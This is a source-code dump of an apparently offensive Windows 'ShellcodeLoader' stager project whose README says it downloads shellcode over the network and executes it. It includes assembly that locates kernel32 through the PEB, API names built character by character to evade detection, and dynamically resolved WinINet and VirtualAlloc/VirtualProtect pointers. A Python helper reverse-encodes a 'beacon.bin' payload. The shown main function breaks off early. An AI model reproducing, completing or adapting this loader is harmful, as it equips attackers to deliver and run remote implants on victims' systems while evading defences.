├── README.md
├── stager
├── getProcAdddress.asm
├── BinToStr.py
├── Init.h
├── stager.vcxproj.filters
├── Function.cpp
├── Function.h
├── Init.cpp
├── stager.vcxproj
└── stager.cpp
├── stager.sln
├── .gitattributes
└── .gitignore
/README.md:
--------------------------------------------------------------------------------
1 | # ShellcodeLoader_stager
2 | 自用ShellcodeLoader模板,通过网络获取shellcode并执行。
3 |
--------------------------------------------------------------------------------
/stager/getProcAdddress.asm:
--------------------------------------------------------------------------------
1 |
2 | .code
3 | getKernel32 proc
4 | mov rax,gs:[60h]
5 | mov rax,[rax+18h]
6 | mov rax,[rax+30h]
7 | mov rax,[rax]
8 | mov rax,[rax]
9 | mov rax,[rax+10h]
10 | ret
11 | getKernel32 endp
12 | end
--------------------------------------------------------------------------------
/stager/BinToStr.py:
--------------------------------------------------------------------------------
1 | import binascii
2 |
3 | # 读取二进制文本并显示为16进制
4 | def readBinfile(binFile_path:str):
5 | str = ""
6 | print()
7 | with open(binFile_path, 'rb') as f:
8 | num = 0
9 | while 1:
10 | a = f.read(1)
11 | if not a:
12 | break
13 | hexstr = binascii.b2a_hex(a)
14 | str += hexstr.decode().upper()
15 | num += 1
16 | print(str[::-1])
17 | str = str[::-1]
18 | fileName='shell.txt'
19 | with open(fileName,'w')as file:
20 | file.write(str)
21 |
22 |
23 | readBinfile('beacon.bin')
24 |
--------------------------------------------------------------------------------
/stager/Init.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | //#include "struct.h"
3 | #include "Function.h"
4 |
5 |
6 | class Init
7 | {
8 |
9 | public:
10 | static Init* myInit;
11 |
12 | FN_GetProcAddress fn_GetProcAddress;
13 | FN_LoadLibraryW fn_LoadLibraryW;
14 | FN_LoadLibraryA fn_LoadLibraryA;
15 | FM_VirtualAlloc fn_VirtualAlloc;
16 | FM_VirtualProtect fn_VirtualProtect;
17 |
18 | Fn_InternetOpenA fn_InternetOpenA;
19 | Fn_InternetConnectA fn_InternetConnectA;
20 | Fn_HttpOpenRequestA fn_HttpOpenRequestA;
21 | Fn_HttpSendRequestW fn_HttpSendRequestW;
22 | Fn_InternetQueryOptionW fn_InternetQueryOptionW;
23 | Fn_InternetSetOptionW fn_InternetSetOptionW;
24 | Fn_InternetReadFile fn_InternetReadFile;
25 | Fn_InternetCloseHandle fn_InternetCloseHandle;
26 |
27 | public:
28 | static Init* GetInstance();
29 | void FindFuncionAddr();
30 |
31 | private:
32 |
33 | };
34 |
35 |
--------------------------------------------------------------------------------
/stager.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.1.32421.90
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "stager", "stager\stager.vcxproj", "{FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Debug|x64.ActiveCfg = Debug|x64
17 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Debug|x64.Build.0 = Debug|x64
18 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Debug|x86.ActiveCfg = Debug|Win32
19 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Debug|x86.Build.0 = Debug|Win32
20 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Release|x64.ActiveCfg = Release|x64
21 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Release|x64.Build.0 = Release|x64
22 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Release|x86.ActiveCfg = Release|Win32
23 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {4FBEB2EC-CCD0-4763-8841-C74AF44207A6}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/stager/stager.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 | 源文件
23 |
24 |
25 | 源文件
26 |
27 |
28 |
29 |
30 | 头文件
31 |
32 |
33 | 头文件
34 |
35 |
36 |
37 |
38 | 源文件
39 |
40 |
41 |
--------------------------------------------------------------------------------
/stager/Function.cpp:
--------------------------------------------------------------------------------
1 | #include "Function.h"
2 |
3 | //FARPROC getProcAddress(HMODULE hModuleBase)
4 | //{
5 | // PIMAGE_DOS_HEADER lpDosHeader = (PIMAGE_DOS_HEADER)hModuleBase;
6 | // PIMAGE_NT_HEADERS64 lpNtHeader = (PIMAGE_NT_HEADERS64)((ULONG64)hModuleBase + lpDosHeader->e_lfanew);
7 | // if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size) {
8 | // return NULL;
9 | // }
10 | // if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) {
11 | // return NULL;
12 | // }
13 | // PIMAGE_EXPORT_DIRECTORY lpExports = (PIMAGE_EXPORT_DIRECTORY)((ULONG64)hModuleBase + (ULONG64)lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
14 | // PDWORD lpdwFunName = (PDWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfNames);
15 | // PWORD lpword = (PWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfNameOrdinals);
16 | // PDWORD lpdwFunAddr = (PDWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfFunctions);
17 | //
18 | // DWORD dwLoop = 0;
19 | // FARPROC pRet = NULL;
20 | // for (; dwLoop <= lpExports->NumberOfNames - 1; dwLoop++) {
21 | // char* pFunName = (char*)(lpdwFunName[dwLoop] + (ULONG64)hModuleBase);
22 | //
23 | // if (pFunName[0] == 'G' &&
24 | // pFunName[1] == 'e' &&
25 | // pFunName[2] == 't' &&
26 | // pFunName[3] == 'P' &&
27 | // pFunName[4] == 'r' &&
28 | // pFunName[5] == 'o' &&
29 | // pFunName[6] == 'c' &&
30 | // pFunName[7] == 'A' &&
31 | // pFunName[8] == 'd' &&
32 | // pFunName[9] == 'd' &&
33 | // pFunName[10] == 'r' &&
34 | // pFunName[11] == 'e' &&
35 | // pFunName[12] == 's' &&
36 | // pFunName[13] == 's')
37 | // {
38 | // pRet = (FARPROC)(lpdwFunAddr[lpword[dwLoop]] + (ULONG64)hModuleBase);
39 | // break;
40 | // }
41 | // }
42 | // return pRet;
43 | //}
44 |
--------------------------------------------------------------------------------
/stager/Function.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | typedef FARPROC(WINAPI* FN_GetProcAddress)(_In_ HMODULE hModule,_In_ LPCSTR lpProcName);
5 | typedef HMODULE(WINAPI* FN_LoadLibraryW)(_In_ LPCWSTR lpLibFileName);
6 | typedef HMODULE(WINAPI* FN_LoadLibraryA)(_In_ LPCSTR lpLibFileName);
7 | typedef BOOL(WINAPI* FM_VirtualProtect)(_In_ LPVOID lpAddress,_In_ SIZE_T dwSize,_In_ DWORD flNewProtect,_Out_ PDWORD lpflOldProtect);
8 | typedef PVOID(WINAPI*FM_VirtualAlloc)( _In_opt_ LPVOID lpAddress, _In_ SIZE_T dwSize,_In_ DWORD flAllocationType, _In_ DWORD flProtect);
9 |
10 | typedef LPVOID(_stdcall* Fn_InternetOpenA)(_In_opt_ LPCSTR lpszAgent,_In_ DWORD dwAccessType,_In_opt_ LPCSTR lpszProxy,_In_opt_ LPCSTR lpszProxyBypass,_In_ DWORD dwFlags);
11 | typedef LPVOID(_stdcall* Fn_InternetConnectA)(_In_ LPVOID hInternet,_In_ LPCSTR lpszServerName,_In_ WORD nServerPort,_In_opt_ LPCSTR lpszUserName,_In_opt_ LPCSTR lpszPassword,_In_ DWORD dwService,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);
12 | typedef LPVOID(_stdcall* Fn_HttpOpenRequestA)(_In_ LPVOID hConnect,_In_opt_ LPCSTR lpszVerb,_In_opt_ LPCSTR lpszObjectName,_In_opt_ LPCSTR lpszVersion,_In_opt_ LPCSTR lpszReferrer,_In_opt_z_ LPCSTR FAR* lplpszAcceptTypes,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);
13 | typedef BOOL (_stdcall* Fn_HttpSendRequestW)(_In_ LPVOID hRequest,_In_reads_opt_(dwHeadersLength) LPCWSTR lpszHeaders,_In_ DWORD dwHeadersLength,_In_reads_bytes_opt_(dwOptionalLength) LPVOID lpOptional,_In_ DWORD dwOptionalLength);
14 | typedef BOOL (_stdcall* Fn_InternetQueryOptionW)(_In_opt_ LPVOID hInternet,_In_ DWORD dwOption,_Out_writes_bytes_to_opt_(*lpdwBufferLength, *lpdwBufferLength) __out_data_source(NETWORK) LPVOID lpBuffer,_Inout_ LPDWORD lpdwBufferLength);
15 | typedef BOOL (_stdcall* Fn_InternetSetOptionW)(_In_opt_ LPVOID hInternet,_In_ DWORD dwOption,_In_opt_ LPVOID lpBuffer,_In_ DWORD dwBufferLength);
16 | typedef BOOL(_stdcall* Fn_HttpSendRequestW)(_In_ LPVOID hRequest,_In_reads_opt_(dwHeadersLength) LPCWSTR lpszHeaders,_In_ DWORD dwHeadersLength,_In_reads_bytes_opt_(dwOptionalLength) LPVOID lpOptional,_In_ DWORD dwOptionalLength);
17 | typedef BOOL (_stdcall* Fn_InternetReadFile)(_In_ LPVOID hFile,_Out_writes_bytes_(dwNumberOfBytesToRead) __out_data_source(NETWORK) LPVOID lpBuffer,_In_ DWORD dwNumberOfBytesToRead,_Out_ LPDWORD lpdwNumberOfBytesRead);
18 | typedef BOOL (_stdcall* Fn_InternetCloseHandle)(_In_ LPVOID hInternet);
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/stager/Init.cpp:
--------------------------------------------------------------------------------
1 | #include "Init.h"
2 |
3 | FARPROC getProcAddress(HMODULE hModuleBase);
4 | extern "C" PVOID64 getKernel32();
5 |
6 | Init* Init::myInit = nullptr;
7 |
8 | Init* Init::GetInstance()
9 | {
10 | if (myInit == nullptr)
11 | {
12 | myInit = new Init();
13 | }
14 | return myInit;
15 | }
16 |
17 | void Init::FindFuncionAddr()
18 | {
19 | char xyLoadLibraryW[] = { 'L','o','a','d','L','i','b','r','a','r','y','W',0 };
20 | char xyLoadLibraryA[] = { 'L','o','a','d','L','i','b','r','a','r','y','A',0 };
21 | char xy_Virtualalloc[] = { 'V','i','r','t','u','a','l','A','l','l','o','c',0 };
22 | char xy_VirtualProtectC[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t',0 };
23 | char xy_VirtualallocEx[] = { 'V','i','r','t','u','a','l','A','l','l','o','c','E','x',0 };
24 |
25 | char xy_Wininet[] = { 'W','i','n','i','n','e','t','.','d','l','l',0 };
26 | char xy_InternetOpenA[] = { 'I','n','t','e','r','n','e','t','O','p','e','n','A',0 };
27 | char xy_HttpSendRequestW[] = { 'H','t','t','p','S','e','n','d','R','e','q','u','e','s','t','W',0 };
28 | char xy_InternetQueryOptionW[] = { 'I','n','t','e','r','n','e','t','Q','u','e','r','y','O','p','t','i','o','n','W',0 };
29 | char InternetSetOptionW[] = { 'I','n','t','e','r','n','e','t','S','e','t','O','p','t','i','o','n','W',0 };
30 | char xy_InternetReadFile[] = { 'I','n','t','e','r','n','e','t','R','e','a','d','F','i','l','e',0 };
31 | char xy_InternetConnectA[] = { 'I','n','t','e','r','n','e','t','C','o','n','n','e','c','t','A',0 };
32 | char xy_HttpOpenRequestA[] = { 'H','t','t','p','O','p','e','n','R','e','q','u','e','s','t','A',0 };
33 | char xy_InternetCloseHandle[] = { 'I','n','t','e','r','n','e','t','C','l','o','s','e','H','a','n','d','l','e',0 };
34 |
35 | Init::fn_GetProcAddress = (FN_GetProcAddress)getProcAddress((HMODULE)getKernel32());
36 | Init::fn_LoadLibraryW = (FN_LoadLibraryW)fn_GetProcAddress((HMODULE)getKernel32(), xyLoadLibraryW);
37 | Init::fn_LoadLibraryW = (FN_LoadLibraryW)fn_GetProcAddress((HMODULE)getKernel32(), xyLoadLibraryA);
38 | Init::fn_VirtualAlloc = (FM_VirtualAlloc)fn_GetProcAddress((HMODULE)getKernel32(), xy_Virtualalloc);
39 | Init::fn_VirtualProtect = (FM_VirtualProtect)fn_GetProcAddress((HMODULE)getKernel32(), xy_VirtualProtectC);
40 |
41 | Init::fn_InternetOpenA = (Fn_InternetOpenA)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_InternetOpenA);
42 | Init::fn_HttpSendRequestW = (Fn_HttpSendRequestW)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_HttpSendRequestW);
43 | Init::fn_InternetQueryOptionW = (Fn_InternetQueryOptionW)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_InternetQueryOptionW);
44 | Init::fn_InternetSetOptionW = (Fn_InternetSetOptionW)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), InternetSetOptionW);
45 | Init::fn_InternetReadFile = (Fn_InternetReadFile)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_InternetReadFile);
46 | Init::fn_InternetConnectA = (Fn_InternetConnectA)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_InternetConnectA);
47 | Init::fn_HttpOpenRequestA = (Fn_HttpOpenRequestA)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_HttpOpenRequestA);
48 | Init::fn_InternetCloseHandle = (Fn_InternetCloseHandle)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_InternetCloseHandle);
49 |
50 | }
51 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Oo]ut/
33 | [Ll]og/
34 | [Ll]ogs/
35 |
36 | # Visual Studio 2015/2017 cache/options directory
37 | .vs/
38 | # Uncomment if you have tasks that create the project's static files in wwwroot
39 | #wwwroot/
40 |
41 | # Visual Studio 2017 auto generated files
42 | Generated\ Files/
43 |
44 | # MSTest test Results
45 | [Tt]est[Rr]esult*/
46 | [Bb]uild[Ll]og.*
47 |
48 | # NUnit
49 | *.VisualState.xml
50 | TestResult.xml
51 | nunit-*.xml
52 |
53 | # Build Results of an ATL Project
54 | [Dd]ebugPS/
55 | [Rr]eleasePS/
56 | dlldata.c
57 |
58 | # Benchmark Results
59 | BenchmarkDotNet.Artifacts/
60 |
61 | # .NET Core
62 | project.lock.json
63 | project.fragment.lock.json
64 | artifacts/
65 |
66 | # ASP.NET Scaffolding
67 | ScaffoldingReadMe.txt
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 |
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 |
309 | # FAKE - F# Make
310 | .fake/
311 |
312 | # CodeRush personal settings
313 | .cr/personal
314 |
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 |
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 |
323 | # Tabs Studio
324 | *.tss
325 |
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 |
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 |
335 | # OpenCover UI analysis results
336 | OpenCover/
337 |
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 |
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 |
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------
/stager/stager.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {fce9a4b4-be8c-4e90-8b8c-09c4c42f6041}
25 | stager
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | true
76 |
77 |
78 | false
79 |
80 |
81 | true
82 |
83 |
84 | false
85 |
86 |
87 |
88 | Level3
89 | true
90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Console
95 | true
96 |
97 |
98 |
99 |
100 | Level3
101 | true
102 | true
103 | true
104 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Console
109 | true
110 | true
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 | true
118 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
119 | true
120 |
121 |
122 | Console
123 | true
124 |
125 |
126 |
127 |
128 | Level3
129 | true
130 | true
131 | true
132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
133 | true
134 | MultiThreaded
135 | false
136 | Disabled
137 |
138 |
139 | Console
140 | true
141 | true
142 | true
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
--------------------------------------------------------------------------------
/stager/stager.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | FARPROC getProcAddress(HMODULE hModuleBase);
5 | extern "C" PVOID64 getKernel32();
6 |
7 | //#pragma comment(linker, "/SUBSYSTEM:WINDOWS")
8 |
9 | typedef struct _UNICODE_STRING
10 | {
11 | WORD Length;
12 | WORD MaximumLength;
13 | PUINT64 Buffer;
14 | } UNICODE_STRING, *PUNICODE_STRING;
15 |
16 | //HMODULE getKernel32()
17 | //{
18 | // PVOID64 Peb = (PVOID64)__readgsqword(0x60);
19 | // PVOID64 LDR_DATA_Addr = *(PVOID64**)((BYTE*)Peb + 0x18); //0x018是LDR相对于PEB偏移 存放着LDR的基地址
20 | // UNICODE_STRING* FullName;
21 | // HMODULE hKernel32 = NULL;
22 | // LIST_ENTRY64* pNode = NULL;
23 | // pNode = (LIST_ENTRY64*)(*(PVOID64**)((BYTE*)LDR_DATA_Addr + 0x30)); //偏移到InInitializationOrderModuleList
24 | // DWORD Count = 0;
25 | // while (true)
26 | // {
27 | // FullName = (UNICODE_STRING*)((BYTE*)pNode + 0x38);//BaseDllName基于InInitialzationOrderModuList的偏移
28 | // if (Count == 2)
29 | // {
30 | // hKernel32 = (HMODULE)(*((ULONG64*)((BYTE*)pNode + 0x10)));//DllBase
31 | // break;
32 | // }
33 | // pNode = (LIST_ENTRY64*)pNode->Flink;
34 | // Count++;
35 | // }
36 | // return hKernel32;
37 | //}
38 |
39 | int my_strlen(const char* p)
40 | {
41 | char* start = (char*)p;
42 | char* end = NULL;
43 | while (*p != '\0')
44 | {
45 | p++;
46 | end = (char*)p;
47 | }
48 | return end - start;
49 | }
50 |
51 | int main()
52 | {
53 | typedef FARPROC(WINAPI* FN_GetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
54 | typedef HMODULE(WINAPI* FN_LoadLibraryA)( LPCSTR lpLibFileName);
55 | typedef BOOL(WINAPI* FM_VirtualProtect)( LPVOID lpAddress, SIZE_T dwSize,DWORD flNewProtect,PDWORD lpflOldProtect);
56 | typedef PVOID(WINAPI* FM_VirtualAlloc)( LPVOID lpAddress, SIZE_T dwSize,DWORD flAllocationType, DWORD flProtect);
